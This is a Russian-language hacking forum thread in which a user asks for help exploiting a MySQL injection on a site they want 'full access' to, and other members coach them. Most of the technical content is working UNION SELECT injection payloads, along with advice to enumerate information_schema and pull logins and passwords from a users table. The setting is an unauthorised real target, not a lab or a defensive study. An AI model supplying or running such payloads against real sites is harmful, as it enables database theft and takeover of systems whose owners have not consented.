да ошибки могут и быть. страница с правильным кол-вом столбцов должна отличаться от страниц с другим кол-вом столбцов. В идеале увидешь свои циферке на странице)

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Спасибо. За помощь буду подбирать. У меня еще такой вопрос: у меня есть исходный код этого скрипта и таблица(но она не полная, возможно нет некоторых столбцов), может ли мне это чем-то помочь в подборе столбцов.

Что за хня может быть:
есть исходника скриптов, делаю МуСкул-инекцию после ЛИМИТ, а она не проходит.
Делаю - display=1,1/* - нормально могу управлять ЛИМИТОМ.
потом устанавливаю через коментарии, что 4 база МуСкула.
делаю display=1,1+union+select+null,null,n.../* короче, скрипт перебирает, но вегда пустое значение,
пробовал заменить пробулы на /**/ - ничего.
Подскажите, что это может быть и варианты как обойти

Может
Найди в коде запрос с уязвимой переменной, там будет что то типа
Select blabla,blabla2,blabla3 from blablatable where blablaid=$id
если так, то кол во столбцов 3
если будет типа
select * from blablatable where blablaid=$id
то надо уже смотреть таблицу
=================================
upd
инъекция после лимита don't work

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

я уже смотрел исходники там:
SELECT DISTINCT cds_Prod.*, cc_ProductSummary.*, imPRICE.* FROM cds_Prod,cc_ProductSummary,imPRICE WHERE .... LIMIT $display,10

пробовал даже display=1,1 union SELECT cds_Prod.*, cc_ProductSummary.*, imPRICE.* FROM cds_Prod,cc_ProductSummary,imPRICE limit 1,1/*

тоесть по идеи должно работать, но что-то не хочет. Может какие-то настройки сервера?

Spyder большое спасибо за помощь. Уже подобрал столбцы.
Теперь надо использовать эту уязвимость чтоб получить полный доступ к сайту.
Использовал USER(),VERSION(), DATABASE() – все получил. Но что с этого??? Я хочу получить полный доступ!!! Помогите плис.

Если версия >5 извлекай инфу из information_schema
если <5 подбирай названия таблиц вручную
Вообще почитай статьи, на ачате они в большом количестве, там всё хорошо описано
Рекомендую статью Зако, она в этом разделе закреплена как важная
======
upd
https://forum.antichat.ru/thread19844.html

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Как прочесть пасс и логин когда я знаю как называется таблица, и столбец. Можно ли использовать например такое:
1.php?page=-1+union+select+1,2,3,4,5,6+from+users+where+id=1/*

Если да, то почему у меня не получается ???
И еще вопрос можно ли изменить ячейку в любом столбце, например поставить в столбце «уровень админа» 1 или нет???

Изменить не получится
пробуй так
1.php?page=-1+union+select+username,2,3,4,5,6+from+users+where +id=1/*
1.php?page=-1+union+select+login,2,3,4,5,6+from+users+where+id =1/*
1.php?page=-1+union+select+user,2,3,4,5,6+from+users+where+id= 1/*

Учи мат часть =-\

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands